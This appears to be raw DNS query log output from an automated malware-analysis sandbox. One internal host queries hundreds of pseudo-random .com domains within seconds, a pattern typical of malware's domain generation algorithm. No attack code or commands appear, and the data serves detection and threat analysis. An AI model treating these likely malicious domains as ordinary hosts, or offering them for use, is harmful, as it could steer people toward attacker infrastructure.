                                                                                                                                                                                                          Nov 11, 2024 18:24:24.720391989 CET192.168.2.81.1.1.10x137aStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.720864058 CET192.168.2.81.1.1.10x51f6Standard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721031904 CET192.168.2.81.1.1.10xd37aStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721129894 CET192.168.2.81.1.1.10xaefaStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721220970 CET192.168.2.81.1.1.10x146fStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.721605062 CET192.168.2.81.1.1.10x14c6Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.731211901 CET192.168.2.81.1.1.10x7745Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.732768059 CET192.168.2.81.1.1.10xdf86Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733011961 CET192.168.2.81.1.1.10xfce7Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733165979 CET192.168.2.81.1.1.10x9d18Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733557940 CET192.168.2.81.1.1.10x9789Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733674049 CET192.168.2.81.1.1.10xfc6dStandard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733782053 CET192.168.2.81.1.1.10x4ac0Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733880997 CET192.168.2.81.1.1.10xb367Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.733985901 CET192.168.2.81.1.1.10x2869Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734227896 CET192.168.2.81.1.1.10xee01Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734265089 CET192.168.2.81.1.1.10x1b16Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734455109 CET192.168.2.81.1.1.10x8b02Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734467983 CET192.168.2.81.1.1.10x1d6dStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.734674931 CET192.168.2.81.1.1.10x4a08Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.745874882 CET192.168.2.81.1.1.10xad6bStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746000051 CET192.168.2.81.1.1.10xb4b0Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746175051 CET192.168.2.81.1.1.10x1b62Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746678114 CET192.168.2.81.1.1.10x2899Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.746841908 CET192.168.2.81.1.1.10x9b19Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747005939 CET192.168.2.81.1.1.10x132Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747189999 CET192.168.2.81.1.1.10x4c82Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747616053 CET192.168.2.81.1.1.10x3d2aStandard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.747848034 CET192.168.2.81.1.1.10xa10Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748145103 CET192.168.2.81.1.1.10x6dd5Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748385906 CET192.168.2.81.1.1.10xc6f4Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748577118 CET192.168.2.81.1.1.10x4920Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.748842001 CET192.168.2.81.1.1.10xad98Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752604008 CET192.168.2.81.1.1.10xd038Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.752970934 CET192.168.2.81.1.1.10xea2bStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:24.756412983 CET192.168.2.81.1.1.10x6a4fStandard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.407094002 CET192.168.2.81.1.1.10x7548Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.409181118 CET192.168.2.81.1.1.10x46a8Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.411335945 CET192.168.2.81.1.1.10x5031Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.411710978 CET192.168.2.81.1.1.10x4fb3Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.416416883 CET192.168.2.81.1.1.10x37Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.425599098 CET192.168.2.81.1.1.10x6417Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.429991007 CET192.168.2.81.1.1.10xa9faStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.431046963 CET192.168.2.81.1.1.10x98e6Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.431489944 CET192.168.2.81.1.1.10x9016Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.458750010 CET192.168.2.81.1.1.10x2be7Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.458950043 CET192.168.2.81.1.1.10x63ceStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.458986044 CET192.168.2.81.1.1.10x5c9cStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.459173918 CET192.168.2.81.1.1.10xc62bStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.459445000 CET192.168.2.81.1.1.10xc0b7Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.459628105 CET192.168.2.81.1.1.10x5c91Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.463248968 CET192.168.2.81.1.1.10x3e31Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.463526964 CET192.168.2.81.1.1.10xf6f2Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.465370893 CET192.168.2.81.1.1.10x79faStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.465658903 CET192.168.2.81.1.1.10x1d75Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.467786074 CET192.168.2.81.1.1.10xc265Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.467998028 CET192.168.2.81.1.1.10xf723Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.468548059 CET192.168.2.81.1.1.10x5cc0Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.469434023 CET192.168.2.81.1.1.10xcbc9Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.471796989 CET192.168.2.81.1.1.10xd883Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.472723007 CET192.168.2.81.1.1.10x42f9Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.473649025 CET192.168.2.81.1.1.10x143dStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.473865032 CET192.168.2.81.1.1.10x74e4Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.474267006 CET192.168.2.81.1.1.10xaf46Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.476170063 CET192.168.2.81.1.1.10xe074Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.476876020 CET192.168.2.81.1.1.10x4488Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.479991913 CET192.168.2.81.1.1.10xa868Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.480460882 CET192.168.2.81.1.1.10x568aStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.480632067 CET192.168.2.81.1.1.10x7a02Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.481132984 CET192.168.2.81.1.1.10xcf88Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.483261108 CET192.168.2.81.1.1.10x950fStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.483480930 CET192.168.2.81.1.1.10x47eaStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.483500004 CET192.168.2.81.1.1.10x9169Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.484103918 CET192.168.2.81.1.1.10xa4fStandard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.495964050 CET192.168.2.81.1.1.10x1146Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.496671915 CET192.168.2.81.1.1.10x549eStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.496865988 CET192.168.2.81.1.1.10x9f78Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.501802921 CET192.168.2.81.1.1.10x5be2Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502439022 CET192.168.2.81.1.1.10x64aeStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502561092 CET192.168.2.81.1.1.10xfe7dStandard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502775908 CET192.168.2.81.1.1.10x1a9bStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.502916098 CET192.168.2.81.1.1.10xaa38Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503106117 CET192.168.2.81.1.1.10x56e7Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503207922 CET192.168.2.81.1.1.10x4a04Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503295898 CET192.168.2.81.1.1.10x595fStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503464937 CET192.168.2.81.1.1.10x9907Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503540993 CET192.168.2.81.1.1.10xdba1Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503703117 CET192.168.2.81.1.1.10x4c84Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.503740072 CET192.168.2.81.1.1.10x268eStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.504436016 CET192.168.2.81.1.1.10x499eStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.504631996 CET192.168.2.81.1.1.10xf370Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.508383036 CET192.168.2.81.1.1.10x4d5fStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.508810043 CET192.168.2.81.1.1.10x729Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.523996115 CET192.168.2.81.1.1.10x2a98Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.540404081 CET192.168.2.81.1.1.10x4d16Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.540606022 CET192.168.2.81.1.1.10x1318Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.542416096 CET192.168.2.81.1.1.10x16ffStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.549356937 CET192.168.2.81.1.1.10x6b7aStandard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.589745998 CET192.168.2.81.1.1.10x8653Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.589798927 CET192.168.2.81.1.1.10x9e03Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.769126892 CET192.168.2.81.1.1.10x6d2aStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.769696951 CET192.168.2.81.1.1.10xd34bStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.779234886 CET192.168.2.81.1.1.10x8acbStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.779603004 CET192.168.2.81.1.1.10x2366Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.780575991 CET192.168.2.81.1.1.10x13dStandard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.783005953 CET192.168.2.81.1.1.10x8e12Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.784356117 CET192.168.2.81.1.1.10x385dStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.784477949 CET192.168.2.81.1.1.10x4caeStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.784991980 CET192.168.2.81.1.1.10x561aStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.785099983 CET192.168.2.81.1.1.10xed63Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.785608053 CET192.168.2.81.1.1.10xcd51Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.785731077 CET192.168.2.81.1.1.10x614Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.786250114 CET192.168.2.81.1.1.10x6065Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.786267996 CET192.168.2.81.1.1.10xc1e0Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.786773920 CET192.168.2.81.1.1.10x23f7Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.787220955 CET192.168.2.81.1.1.10xbc21Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.787579060 CET192.168.2.81.1.1.10x351eStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.787717104 CET192.168.2.81.1.1.10x938eStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.788357019 CET192.168.2.81.1.1.10xcf96Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.788965940 CET192.168.2.81.1.1.10xb7e0Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.789024115 CET192.168.2.81.1.1.10xa595Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.790901899 CET192.168.2.81.1.1.10xec14Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.806716919 CET192.168.2.81.1.1.10xaf0cStandard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.822846889 CET192.168.2.81.1.1.10x3ebfStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.822984934 CET192.168.2.81.1.1.10x3abeStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.823241949 CET192.168.2.81.1.1.10xbc59Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.925997972 CET192.168.2.81.1.1.10xccdStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.926224947 CET192.168.2.81.1.1.10xa7b0Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.926384926 CET192.168.2.81.1.1.10xdd79Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.926701069 CET192.168.2.81.1.1.10x7a9cStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.926907063 CET192.168.2.81.1.1.10x9df1Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.927056074 CET192.168.2.81.1.1.10x2d4dStandard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.927509069 CET192.168.2.81.1.1.10xc868Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.927917957 CET192.168.2.81.1.1.10xf6d3Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.928251982 CET192.168.2.81.1.1.10x9fb9Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.928591013 CET192.168.2.81.1.1.10x76ceStandard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.929032087 CET192.168.2.81.1.1.10xe81dStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.930270910 CET192.168.2.81.1.1.10xdb6Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.931021929 CET192.168.2.81.1.1.10xbe4bStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.932466030 CET192.168.2.81.1.1.10x9ae8Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.957534075 CET192.168.2.81.1.1.10x48c7Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.966867924 CET192.168.2.81.1.1.10x5689Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.968499899 CET192.168.2.81.1.1.10x3796Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.968756914 CET192.168.2.81.1.1.10x6cffStandard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.972794056 CET192.168.2.81.1.1.10xb89cStandard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.976752043 CET192.168.2.81.1.1.10x560dStandard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.976804972 CET192.168.2.81.1.1.10xdac0Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.977018118 CET192.168.2.81.1.1.10xf793Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.977252960 CET192.168.2.81.1.1.10x5ae9Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.977471113 CET192.168.2.81.1.1.10x6a3aStandard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.977811098 CET192.168.2.81.1.1.10x9c96Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.978254080 CET192.168.2.81.1.1.10xe829Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.978426933 CET192.168.2.81.1.1.10x273dStandard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.978578091 CET192.168.2.81.1.1.10xd631Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.978734970 CET192.168.2.81.1.1.10xe76fStandard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.978878975 CET192.168.2.81.1.1.10xddd6Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.980304003 CET192.168.2.81.1.1.10x7d3dStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.980645895 CET192.168.2.81.1.1.10x9c9fStandard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.980809927 CET192.168.2.81.1.1.10xcc1eStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.980860949 CET192.168.2.81.1.1.10xed06Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.981092930 CET192.168.2.81.1.1.10xeca2Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.981242895 CET192.168.2.81.1.1.10xe7bStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.982409000 CET192.168.2.81.1.1.10xe875Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:25.982435942 CET192.168.2.81.1.1.10xb7eeStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.726350069 CET192.168.2.81.1.1.10xf80Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.729312897 CET192.168.2.81.1.1.10x5368Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.740271091 CET192.168.2.81.1.1.10x3a27Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.743508101 CET192.168.2.81.1.1.10x2b27Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.756608009 CET192.168.2.81.1.1.10x8c1dStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.758647919 CET192.168.2.81.1.1.10xc8a4Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.759891987 CET192.168.2.81.1.1.10x447bStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.760181904 CET192.168.2.81.1.1.10x57bbStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.760723114 CET192.168.2.81.1.1.10x910eStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.760849953 CET192.168.2.81.1.1.10xe761Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.761657000 CET192.168.2.81.1.1.10xce9cStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.762228012 CET192.168.2.81.1.1.10xd07bStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.762456894 CET192.168.2.81.1.1.10x7ef3Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.763197899 CET192.168.2.81.1.1.10xec37Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.763552904 CET192.168.2.81.1.1.10xab5fStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.764419079 CET192.168.2.81.1.1.10x6d3cStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.802722931 CET192.168.2.81.1.1.10x5ee2Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.806876898 CET192.168.2.81.1.1.10xc7ceStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.806926012 CET192.168.2.81.1.1.10x6340Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
